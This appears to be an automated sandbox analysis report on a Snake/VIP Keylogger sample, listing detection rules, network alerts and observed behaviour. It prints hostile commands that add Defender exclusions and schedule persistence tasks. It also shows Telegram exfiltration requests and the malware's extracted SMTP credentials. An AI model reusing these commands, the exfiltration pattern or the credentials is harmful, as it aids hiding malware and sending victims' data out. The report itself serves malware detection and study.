Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\yxXYABHh.exe", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6512, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp", ProcessId: 2872, ProcessName: schtasks.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PvAmrCZENy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PvAmrCZENy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PvAmrCZENy.exe", ParentImage: C:\Users\user\Desktop\PvAmrCZENy.exe, ParentProcessId: 7112, ParentProcessName: PvAmrCZENy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PvAmrCZENy.exe", ProcessId: 6240, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp5E89.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp5E89.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\yxXYABHh.exe, ParentImage: C:\Users\user\AppData\Roaming\yxXYABHh.exe, ParentProcessId: 5912, ParentProcessName: yxXYABHh.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp5E89.tmp", ProcessId: 7268, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\yxXYABHh.exe", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6512, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp", ProcessId: 2872, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PvAmrCZENy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PvAmrCZENy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PvAmrCZENy.exe", ParentImage: C:\Users\user\Desktop\PvAmrCZENy.exe, ParentProcessId: 7112, ParentProcessName: PvAmrCZENy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PvAmrCZENy.exe", ProcessId: 6240, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7564, ProcessName: svchost.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\yxXYABHh.exe", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6512, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp", ProcessId: 2872, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T15:38:22.874287+0100	2803305	3	Unknown Traffic	192.168.2.7	49684	104.21.96.1	443	TCP
2025-03-07T15:38:26.547232+0100	2803305	3	Unknown Traffic	192.168.2.7	49688	104.21.96.1	443	TCP
2025-03-07T15:38:41.715441+0100	2803305	3	Unknown Traffic	192.168.2.7	49703	104.21.96.1	443	TCP
2025-03-07T15:38:45.341959+0100	2803305	3	Unknown Traffic	192.168.2.7	49708	104.21.96.1	443	TCP
2025-03-07T15:38:48.909525+0100	2803305	3	Unknown Traffic	192.168.2.7	49712	104.21.96.1	443	TCP
2025-03-07T15:38:48.909675+0100	2803305	3	Unknown Traffic	192.168.2.7	49711	104.21.96.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T15:38:17.604530+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49681	132.226.8.169	80	TCP
2025-03-07T15:38:20.510790+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49681	132.226.8.169	80	TCP
2025-03-07T15:38:21.448255+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49683	132.226.8.169	80	TCP
2025-03-07T15:38:23.917020+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49686	132.226.8.169	80	TCP
2025-03-07T15:38:24.198311+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49683	132.226.8.169	80	TCP
2025-03-07T15:38:27.276560+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49689	132.226.8.169	80	TCP
2025-03-07T15:38:28.120234+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49690	132.226.8.169	80	TCP
2025-03-07T15:38:31.057892+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49693	132.226.8.169	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T15:38:51.734129+0100	1810007	1	Potentially Bad Traffic	192.168.2.7	49716	149.154.167.220	443	TCP
2025-03-07T15:38:55.290739+0100	1810007	1	Potentially Bad Traffic	192.168.2.7	49720	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: PvAmrCZENy.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe

Avira: detection malicious, Label: TR/Kryptik.jxxgz

Found malware configuration

Source: 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587"}
Source: 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe

ReversingLabs: Detection: 71%

Multi AV Scanner detection for submitted file

Source: PvAmrCZENy.exe	Virustotal: Detection: 77%			Perma Link
Source: PvAmrCZENy.exe	ReversingLabs: Detection: 71%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack	String decryptor: royals@htcp.homes
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack	String decryptor: 7213575aceACE@@
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack	String decryptor: mail.htcp.homes
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack	String decryptor: royal@htcp.homes
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack	String decryptor: 587
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack	String decryptor:
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack	String decryptor: royals@htcp.homes
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack	String decryptor: 7213575aceACE@@
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack	String decryptor: mail.htcp.homes
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack	String decryptor: royal@htcp.homes
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack	String decryptor: 587
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack	String decryptor:
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack	String decryptor: royals@htcp.homes
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack	String decryptor: 7213575aceACE@@
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack	String decryptor: mail.htcp.homes
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack	String decryptor: royal@htcp.homes
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack	String decryptor: 587
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack	String decryptor:

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: PvAmrCZENy.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.7:49682 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.7:49685 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49720 version: TLS 1.2

Source: PvAmrCZENy.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: nqHL.pdb source: PvAmrCZENy.exe, yxXYABHh.exe.0.dr
Source:	Binary string: nqHL.pdbSHA256T source: PvAmrCZENy.exe, yxXYABHh.exe.0.dr

Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 4x nop then jmp 0244F8E9h	7_2_0244F631
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 4x nop then jmp 0244FD41h	7_2_0244FA88
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 4x nop then jmp 064031E0h	7_2_06402DC8
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 4x nop then jmp 06400D0Dh	7_2_06400B30
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 4x nop then jmp 06401697h	7_2_06400B30
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 4x nop then jmp 06402C19h	7_2_06402968
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 4x nop then jmp 0640E0A9h	7_2_0640DE00
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 4x nop then jmp 0640E959h	7_2_0640E6B0
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 4x nop then jmp 0640F209h	7_2_0640EF60
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 4x nop then jmp 0640CF49h	7_2_0640CCA0
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 4x nop then jmp 0640D7F9h	7_2_0640D550
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 4x nop then jmp 064031E0h	7_2_06402DC2
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 4x nop then jmp 0640E501h	7_2_0640E258
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 4x nop then jmp 0640EDB1h	7_2_0640EB08
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 4x nop then jmp 0640F661h	7_2_0640F3B8
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_06400040
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 4x nop then jmp 0640FAB9h	7_2_0640F810
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 4x nop then jmp 0640D3A1h	7_2_0640D0F8
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 4x nop then jmp 064031E0h	7_2_0640310E
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 4x nop then jmp 0640DC51h	7_2_0640D9A8
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 4x nop then jmp 06A0BAD3h	8_2_06A0B265
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 4x nop then jmp 02BAF8E9h	12_2_02BAF631
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 4x nop then jmp 02BAFD41h	12_2_02BAFA88
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 4x nop then jmp 0587DC51h	12_2_0587D9A8
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 4x nop then jmp 058731E0h	12_2_05872DBE
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 4x nop then jmp 058731E0h	12_2_05872DC8
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 4x nop then jmp 058731E0h	12_2_0587310E
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 4x nop then jmp 0587D7F9h	12_2_0587D550
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 4x nop then jmp 05872C19h	12_2_05872968
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 4x nop then jmp 0587CF49h	12_2_0587CCA0
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 4x nop then jmp 0587D3A1h	12_2_0587D0F8
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 4x nop then jmp 0587FAB9h	12_2_0587F810
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	12_2_05870040
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	12_2_05870853
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 4x nop then jmp 0587F661h	12_2_0587F3B8
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 4x nop then jmp 0587EDB1h	12_2_0587EB08
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 4x nop then jmp 05870D0Dh	12_2_05870B30
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 4x nop then jmp 05871697h	12_2_05870B30
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 4x nop then jmp 0587F209h	12_2_0587EF60
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 4x nop then jmp 0587E959h	12_2_0587E6B0
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 4x nop then jmp 0587E0A9h	12_2_0587DE00
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 4x nop then jmp 0587E501h	12_2_0587E258
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	12_2_05870673

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49720 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49716 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2008/03/2025%20/%2020:54:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2008/03/2025%20/%2021:04:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49693 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49689 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49690 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49686 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49683 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49681 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49684 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49703 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49708 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49688 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49711 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49712 -> 104.21.96.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.7:49682 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.7:49685 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
